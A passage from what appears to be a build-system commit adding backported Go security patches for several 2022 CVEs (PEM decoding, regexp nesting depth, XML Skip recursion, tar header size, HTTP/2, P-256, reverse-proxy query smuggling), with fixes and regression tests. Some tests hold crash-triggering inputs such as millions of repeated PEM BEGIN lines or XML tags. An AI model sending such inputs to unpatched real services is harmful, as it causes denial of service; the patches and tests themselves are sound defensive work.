++			key = bytes.TrimSpace(key)
++			val = bytes.TrimSpace(val)
++			p.Headers[string(key)] = string(val)
++			rest = next
++		}
+ 
+-	// After the "-----" of the ending line, there should be the same type
+-	// and then a final five dashes.
+-	endTrailer := rest[endTrailerIndex:]
+-	endTrailerLen := len(typeLine) + len(pemEndOfLine)
+-	if len(endTrailer) < endTrailerLen {
+-		return decodeError(data, rest)
+-	}
++		var endIndex, endTrailerIndex int
+ 
+-	restOfEndLine := endTrailer[endTrailerLen:]
+-	endTrailer = endTrailer[:endTrailerLen]
+-	if !bytes.HasPrefix(endTrailer, typeLine) ||
+-		!bytes.HasSuffix(endTrailer, pemEndOfLine) {
+-		return decodeError(data, rest)
+-	}
++		// If there were no headers, the END line might occur
++		// immediately, without a leading newline.
++		if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
++			endIndex = 0
++			endTrailerIndex = len(pemEnd) - 1
++		} else {
++			endIndex = bytes.Index(rest, pemEnd)
++			endTrailerIndex = endIndex + len(pemEnd)
++		}
+ 
+-	// The line must end with only whitespace.
+-	if s, _ := getLine(restOfEndLine); len(s) != 0 {
+-		return decodeError(data, rest)
+-	}
++		if endIndex < 0 {
++			continue
++		}
+ 
+-	base64Data := removeSpacesAndTabs(rest[:endIndex])
+-	p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
+-	n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
+-	if err != nil {
+-		return decodeError(data, rest)
+-	}
+-	p.Bytes = p.Bytes[:n]
++		// After the "-----" of the ending line, there should be the same type
++		// and then a final five dashes.
++		endTrailer := rest[endTrailerIndex:]
++		endTrailerLen := len(typeLine) + len(pemEndOfLine)
++		if len(endTrailer) < endTrailerLen {
++			continue
++		}
++
++		restOfEndLine := endTrailer[endTrailerLen:]
++		endTrailer = endTrailer[:endTrailerLen]
++		if !bytes.HasPrefix(endTrailer, typeLine) ||
++			!bytes.HasSuffix(endTrailer, pemEndOfLine) {
++			continue
++		}
+ 
+-	// the -1 is because we might have only matched pemEnd without the
+-	// leading newline if the PEM block was empty.
+-	_, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++		// The line must end with only whitespace.
++		if s, _ := getLine(restOfEndLine); len(s) != 0 {
++			continue
++		}
+ 
+-	return
+-}
++		base64Data := removeSpacesAndTabs(rest[:endIndex])
++		p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
++		n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
++		if err != nil {
++			continue
++		}
++		p.Bytes = p.Bytes[:n]
+ 
+-func decodeError(data, rest []byte) (*Block, []byte) {
+-	// If we get here then we have rejected a likely looking, but
+-	// ultimately invalid PEM block. We need to start over from a new
+-	// position. We have consumed the preamble line and will have consumed
+-	// any lines which could be header lines. However, a valid preamble
+-	// line is not a valid header line, therefore we cannot have consumed
+-	// the preamble line for the any subsequent block. Thus, we will always
+-	// find any valid block, no matter what bytes precede it.
+-	//
+-	// For example, if the input is
+-	//
+-	//    -----BEGIN MALFORMED BLOCK-----
+-	//    junk that may look like header lines
+-	//   or data lines, but no END line
+-	//
+-	//    -----BEGIN ACTUAL BLOCK-----
+-	//    realdata
+-	//    -----END ACTUAL BLOCK-----
+-	//
+-	// we've failed to parse using the first BEGIN line
+-	// and now will try again, using the second BEGIN line.
+-	p, rest := Decode(rest)
+-	if p == nil {
+-		rest = data
++		// the -1 is because we might have only matched pemEnd without the
++		// leading newline if the PEM block was empty.
++		_, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++		return p, rest
+ 	}
+-	return p, rest
+ }
+ 
+ const pemLineLength = 64
+diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
+index 8515b46..4485581 100644
+--- a/src/encoding/pem/pem_test.go
++++ b/src/encoding/pem/pem_test.go
+@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
+ dGVzdA==
+ -----ENDBAR-----`
+ 
++const pemMissingEndLine = `
++-----BEGIN FOO-----
++Header: 1`
++
++var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
++
+ var badPEMTests = []struct {
+ 	name  string
+ 	input string
+@@ -131,14 +137,34 @@ var badPEMTests = []struct {
+ 		"missing ending space",
+ 		pemMissingEndingSpace,
+ 	},
++	{
++		"repeating begin",
++		pemRepeatingBegin,
++	},
++	{
++		"missing end line",
++		pemMissingEndLine,
++	},
+ }
+ 
+ func TestBadDecode(t *testing.T) {
+ 	for _, test := range badPEMTests {
+-		result, _ := Decode([]byte(test.input))
++		result, rest := Decode([]byte(test.input))
+ 		if result != nil {
+ 			t.Errorf("unexpected success while parsing %q", test.name)
+ 		}
++		if string(rest) != test.input {
++			t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
++		}
++	}
++}
++
++func TestCVE202224675(t *testing.T) {
++	// Prior to CVE-2022-24675, this input would cause a stack overflow.
++	input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
++	result, rest := Decode(input)
++	if result != nil || !reflect.DeepEqual(rest, input) {
++		t.Errorf("Encode of %#v decoded as %#v", input, rest)
+ 	}
+ }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
+From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 2 Feb 2022 16:41:32 -0500
+Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
+CVE: CVE-2022-24921
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org
+
+
+The regexp code assumes it can recurse over the structure of
+a regexp safely. Go's growable stacks make that reasonable
+for all plausible regexps, but implausible ones can reach the
+“infinite recursion?� stack limit.
+
+This CL limits the depth of any parsed regexp to 1000.
+That is, the depth of the parse tree is required to be ≤ 1000.
+Regexps that require deeper parse trees will return ErrInternalError.
+A future CL will change the error to ErrInvalidDepth,
+but using ErrInternalError for now avoids introducing new API
+in point releases when this is backported.
+
+Fixes #51112.
+Fixes #51117.
+
+Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
+---
+ src/regexp/syntax/parse.go      | 72 ++++++++++++++++++++++++++++++++-
+ src/regexp/syntax/parse_test.go |  7 ++++
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 8c6d43a..55bd20d 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -76,13 +76,29 @@ const (
+ 	opVerticalBar
+ )
+ 
++// maxHeight is the maximum height of a regexp parse tree.
++// It is somewhat arbitrarily chosen, but the idea is to be large enough
++// that no one will actually hit in real use but at the same time small enough
++// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
++// The maximum amount of stack for a single recursive frame is probably
++// closer to 1kB, so this could potentially be raised, but it seems unlikely
++// that people have regexps nested even this deeply.
++// We ran a test on Google's C++ code base and turned up only
++// a single use case with depth > 100; it had depth 128.
++// Using depth 1000 should be plenty of margin.
++// As an optimization, we don't even bother calculating heights
++// until we've allocated at least maxHeight Regexp structures.
++const maxHeight = 1000
++
+ type parser struct {
+ 	flags       Flags     // parse mode flags
+ 	stack       []*Regexp // stack of parsed expressions
+ 	free        *Regexp
+ 	numCap      int // number of capturing groups seen
+ 	wholeRegexp string
+-	tmpClass    []rune // temporary char class work space
++	tmpClass    []rune          // temporary char class work space
++	numRegexp   int             // number of regexps allocated
++	height      map[*Regexp]int // regexp height for height limit check
+ }
+ 
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
+ 		*re = Regexp{}
+ 	} else {
+ 		re = new(Regexp)
++		p.numRegexp++
+ 	}
+ 	re.Op = op
+ 	return re
+ }
+ 
+ func (p *parser) reuse(re *Regexp) {
++	if p.height != nil {
++		delete(p.height, re)
++	}
+ 	re.Sub0[0] = p.free
+ 	p.free = re
+ }
+ 
++func (p *parser) checkHeight(re *Regexp) {
++	if p.numRegexp < maxHeight {
++		return
++	}
++	if p.height == nil {
++		p.height = make(map[*Regexp]int)
++		for _, re := range p.stack {
++			p.checkHeight(re)
++		}
++	}
++	if p.calcHeight(re, true) > maxHeight {
++		panic(ErrInternalError)
++	}
++}
++
++func (p *parser) calcHeight(re *Regexp, force bool) int {
++	if !force {
++		if h, ok := p.height[re]; ok {
++			return h
++		}
++	}
++	h := 1
++	for _, sub := range re.Sub {
++		hsub := p.calcHeight(sub, false)
++		if h < 1+hsub {
++			h = 1 + hsub
++		}
++	}
++	p.height[re] = h
++	return h
++}
++
+ // Parse stack manipulation.
+ 
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ 	}
+ 
+ 	p.stack = append(p.stack, re)
++	p.checkHeight(re)
+ 	return re
+ }
+ 
+@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ 	re.Sub = re.Sub0[:1]
+ 	re.Sub[0] = sub
+ 	p.stack[n-1] = re
++	p.checkHeight(re)
+ 
+ 	if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ 		return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
+ // Flags, and returns a regular expression parse tree. The syntax is
+ // described in the top-level comment.
+ func Parse(s string, flags Flags) (*Regexp, error) {
++	return parse(s, flags)
++}
++
++func parse(s string, flags Flags) (_ *Regexp, err error) {
++	defer func() {
++		switch r := recover(); r {
++		default:
++			panic(r)
++		case nil:
++			// ok
++		case ErrInternalError:
++			err = &Error{Code: ErrInternalError, Expr: s}
++		}
++	}()
++
+ 	if flags&Literal != 0 {
+ 		// Trivial parser for literal string.
+ 		if err := checkUTF8(s); err != nil {
+@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
+ 	// Otherwise, must do real work.
+ 	var (
+ 		p          parser
+-		err        error
+ 		c          rune
+ 		op         Op
+ 		lastRepeat string
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 5581ba1..1ef6d8a 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -207,6 +207,11 @@ var parseTests = []parseTest{
+ 	// Valid repetitions.
+ 	{`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
+ 	{`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
++
++	// Valid nesting.
++	{strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
++	{strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
++	{"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
+ }
+ 
+ const testFlags = MatchNL | PerlX | UnicodeGroups
+@@ -482,6 +487,8 @@ var invalidRegexps = []string{
+ 	`a{100000}`,
+ 	`a{100000,}`,
+ 	"((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
++	strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
++	strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ 	`\Q\E*`,
+ }
+ 
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
+From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 29 Sep 2022 17:06:18 +0530
+Subject: [PATCH] CVE-2022-27664
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
+CVE: CVE-2022-27664
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/h2_bundle.go | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 65d851d..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -3254,10 +3254,11 @@ var (
+ // name (key). See httpguts.ValidHeaderName for the base rules.
+ //
+ // Further, http2 says:
+-//   "Just as in HTTP/1.x, header field names are strings of ASCII
+-//   characters that are compared in a case-insensitive
+-//   fashion. However, header field names MUST be converted to
+-//   lowercase prior to their encoding in HTTP/2. "
++//
++//	"Just as in HTTP/1.x, header field names are strings of ASCII
++//	characters that are compared in a case-insensitive
++//	fashion. However, header field names MUST be converted to
++//	lowercase prior to their encoding in HTTP/2. "
+ func http2validWireHeaderFieldName(v string) bool {
+ 	if len(v) == 0 {
+ 		return false
+@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
+ // validPseudoPath reports whether v is a valid :path pseudo-header
+ // value. It must be either:
+ //
+-//     *) a non-empty string starting with '/'
+-//     *) the string '*', for OPTIONS requests.
++//	*) a non-empty string starting with '/'
++//	*) the string '*', for OPTIONS requests.
+ //
+ // For now this is only used a quick check for deciding when to clean
+ // up Opaque URLs before sending requests from the Transport.
+@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
+ func (sc *http2serverConn) goAway(code http2ErrCode) {
+ 	sc.serveG.check()
+ 	if sc.inGoAway {
++		if sc.goAwayCode == http2ErrCodeNo {
++			sc.goAwayCode = code
++		}
+ 		return
+ 	}
+ 	sc.inGoAway = true
+@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
+ // prior to the headers being written. If the set of trailers is fixed
+ // or known before the header is written, the normal Go trailers mechanism
+ // is preferred:
+-//    https://golang.org/pkg/net/http/#ResponseWriter
+-//    https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
++//
++//	https://golang.org/pkg/net/http/#ResponseWriter
++//	https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
+ const http2TrailerPrefix = "Trailer:"
+ 
+ // promoteUndeclaredTrailers permits http.Handlers to set trailers
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
+From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Mon, 28 Mar 2022 18:41:26 -0700
+Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
+CVE: CVE-2022-28131
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Prevents exhausting the stack limit in _incredibly_ deeply nested
+structures.
+
+Fixes #53711
+Updates #53614
+Fixes CVE-2022-28131
+
+Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+---
+ src/encoding/xml/read.go      | 15 ++++++++-------
+ src/encoding/xml/read_test.go | 18 ++++++++++++++++++
+ 2 files changed, 26 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 4ffed80..3fac859 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -743,12 +743,12 @@ Loop:
+ }
+ 
+ // Skip reads tokens until it has consumed the end element
+-// matching the most recent start element already consumed.
+-// It recurs if it encounters a start element, so it can be used to
+-// skip nested structures.
++// matching the most recent start element already consumed,
++// skipping nested structures.
+ // It returns nil if it finds an end element matching the start
+ // element; otherwise it returns an error describing the problem.
+ func (d *Decoder) Skip() error {
++	var depth int64
+ 	for {
+ 		tok, err := d.Token()
+ 		if err != nil {
+@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
+ 		}
+ 		switch tok.(type) {
+ 		case StartElement:
+-			if err := d.Skip(); err != nil {
+-				return err
+-			}
++			depth++
+ 		case EndElement:
+-			return nil
++			if depth == 0 {
++				return nil
++			}
++			depth--
+ 		}
+ 	}
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 6a20b1a..7a621a5 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,9 +5,11 @@
+ package xml
+ 
+ import (
++	"bytes"
+ 	"errors"
+ 	"io"
+ 	"reflect"
++	"runtime"
+ 	"strings"
+ 	"testing"
+ 	"time"
+@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
+ 		t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
+ 	}
+ }
++
++func TestCVE202230633(t *testing.T) {
++	if runtime.GOARCH == "wasm" {
++		t.Skip("causes memory exhaustion on js/wasm")
++	}
++	defer func() {
++		p := recover()
++		if p != nil {
++			t.Fatal("Unmarshal panicked")
++		}
++	}()
++	var example struct {
++		Things []string
++	}
++	Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
+From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 31 Mar 2022 12:31:58 -0400
+Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
+ P-256
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
+CVE: CVE-2022-28327
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Updates #52075
+Fixes #52076
+Fixes CVE-2022-28327
+
+Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Julie Qiu <julie@golang.org>
+---
+ src/crypto/elliptic/p256.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
+index c23e414..787e3e7 100644
+--- a/src/crypto/elliptic/p256.go
++++ b/src/crypto/elliptic/p256.go
+@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
+ 	n := new(big.Int).SetBytes(in)
+ 	var scalarBytes []byte
+ 
+-	if n.Cmp(p256Params.N) >= 0 {
++	if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
+ 		n.Mod(n, p256Params.N)
+ 		scalarBytes = n.Bytes()
+ 	} else {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
+From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 2 Sep 2022 20:45:18 -0700
+Subject: [PATCH] archive/tar: limit size of headers
+
+Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
+GNU link names), to avoid reading arbitrarily large amounts of data
+into memory.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
+this issue.
+
+Fixes CVE-2022-2879
+Updates #54853
+Fixes #55926
+
+Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
+CVE: CVE-2022-2879
+Signed-off-by: Sunil Kumar <sukumar@mvista.com>
+---
+ src/archive/tar/format.go |  4 ++++
+ src/archive/tar/reader.go | 14 ++++++++++++--
+ src/archive/tar/writer.go |  3 +++
+ 3 files changed, 19 insertions(+), 2 deletions(-)
+
+diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
+index cfe24a5..6642364 100644
+--- a/src/archive/tar/format.go
++++ b/src/archive/tar/format.go
+@@ -143,6 +143,10 @@ const (
+	blockSize  = 512 // Size of each block in a tar stream
+	nameSize   = 100 // Max length of the name field in USTAR format
+	prefixSize = 155 // Max length of the prefix field in USTAR format
++
++	// Max length of a special file (PAX header, GNU long name or link).
++	// This matches the limit used by libarchive.
++	maxSpecialFileSize = 1 << 20
+ )
+
+ // blockPadding computes the number of bytes needed to pad offset up to the
+diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
+index 4f9135b..e996595 100644
+--- a/src/archive/tar/reader.go
++++ b/src/archive/tar/reader.go
+@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
+			continue // This is a meta header affecting the next header
+		case TypeGNULongName, TypeGNULongLink:
+			format.mayOnlyBe(FormatGNU)
+-			realname, err := ioutil.ReadAll(tr)
++			realname, err := readSpecialFile(tr)
+			if err != nil {
+				return nil, err
+			}
+@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
+ // parsePAX parses PAX headers.
+ // If an extended header (type 'x') is invalid, ErrHeader is returned
+ func parsePAX(r io.Reader) (map[string]string, error) {
+-	buf, err := ioutil.ReadAll(r)
++	buf, err := readSpecialFile(r)
+	if err != nil {
+		return nil, err
+	}
+@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
+	return n, err
+ }
+
++// readSpecialFile is like ioutil.ReadAll except it returns
++// ErrFieldTooLong if more than maxSpecialFileSize is read.
++func readSpecialFile(r io.Reader) ([]byte, error) {
++	buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
++	if len(buf) > maxSpecialFileSize {
++		return nil, ErrFieldTooLong
++	}
++	return buf, err
++}
++
+ // discard skips n bytes in r, reporting an error if unable to do so.
+ func discard(r io.Reader, n int64) error {
+	// If possible, Seek to the last byte before the end of the data section.
+diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
+index e80498d..893eac0 100644
+--- a/src/archive/tar/writer.go
++++ b/src/archive/tar/writer.go
+@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
+			flag = TypeXHeader
+		}
+		data := buf.String()
++		if len(data) > maxSpecialFileSize {
++			return ErrFieldTooLong
++		}
+		if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
+			return err // Global headers return here
+		}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
+From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 12:22:41 +0530
+Subject: [PATCH] CVE-2022-2880
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
+CVE: CVE-2022-2880
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http/httputil: avoid query parameter
+
+Query parameter smuggling occurs when a proxy's interpretation
+of query parameters differs from that of a downstream server.
+Change ReverseProxy to avoid forwarding ignored query parameters.
+
+Remove unparsable query parameters from the outbound request
+
+   * if req.Form != nil after calling ReverseProxy.Director; and
+   * before calling ReverseProxy.Rewrite.
+
+This change preserves the existing behavior of forwarding the
+raw query untouched if a Director hook does not parse the query
+by calling Request.ParseForm (possibly indirectly).
+---
+ src/net/http/httputil/reverseproxy.go      | 36 +++++++++++
+ src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
+ 2 files changed, 110 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 2072a5f..c6fb873 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ 	}
+ 
+ 	p.Director(outreq)
++	if outreq.Form != nil {
++		outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
++	}
+ 	outreq.Close = false
+ 
+ 	reqUpType := upgradeType(outreq.Header)
+@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
+ 	_, err := io.Copy(c.backend, c.user)
+ 	errc <- err
+ }
++
++func cleanQueryParams(s string) string {
++	reencode := func(s string) string {
++		v, _ := url.ParseQuery(s)
++		return v.Encode()
++	}
++	for i := 0; i < len(s); {
++		switch s[i] {
++		case ';':
++			return reencode(s)
++		case '%':
++			if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
++				return reencode(s)
++			}
++			i += 3
++		default:
++			i++
++		}
++	}
++	return s
++}
++
++func ishex(c byte) bool {
++	switch {
++	case '0' <= c && c <= '9':
++		return true
++	case 'a' <= c && c <= 'f':
++		return true
++	case 'A' <= c && c <= 'F':
++		return true
++	}
++	return false
++}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 9a7223a..bc87a3b 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
+ 		}
+ 	}
+ }
++
++const (
++	testWantsCleanQuery = true
++	testWantsRawQuery   = false
++)
++
++func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
++	testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
++		proxyHandler := NewSingleHostReverseProxy(u)
++		oldDirector := proxyHandler.Director
++		proxyHandler.Director = func(r *http.Request) {
++			oldDirector(r)
++		}
++		return proxyHandler
++	})
++}
++
++func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
++	testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
++		proxyHandler := NewSingleHostReverseProxy(u)
++		oldDirector := proxyHandler.Director
++		proxyHandler.Director = func(r *http.Request) {
++			// Parsing the form causes ReverseProxy to remove unparsable
++			// query parameters before forwarding.
++			r.FormValue("a")
++			oldDirector(r)
++		}
++		return proxyHandler
++	})
++}
++
++func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
++	const content = "response_content"
++	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++		w.Write([]byte(r.URL.RawQuery))
++	}))
++	defer backend.Close()
++	backendURL, err := url.Parse(backend.URL)
++	if err != nil {
++		t.Fatal(err)
++	}
++	proxyHandler := newProxy(backendURL)
++	frontend := httptest.NewServer(proxyHandler)
++	defer frontend.Close()
++
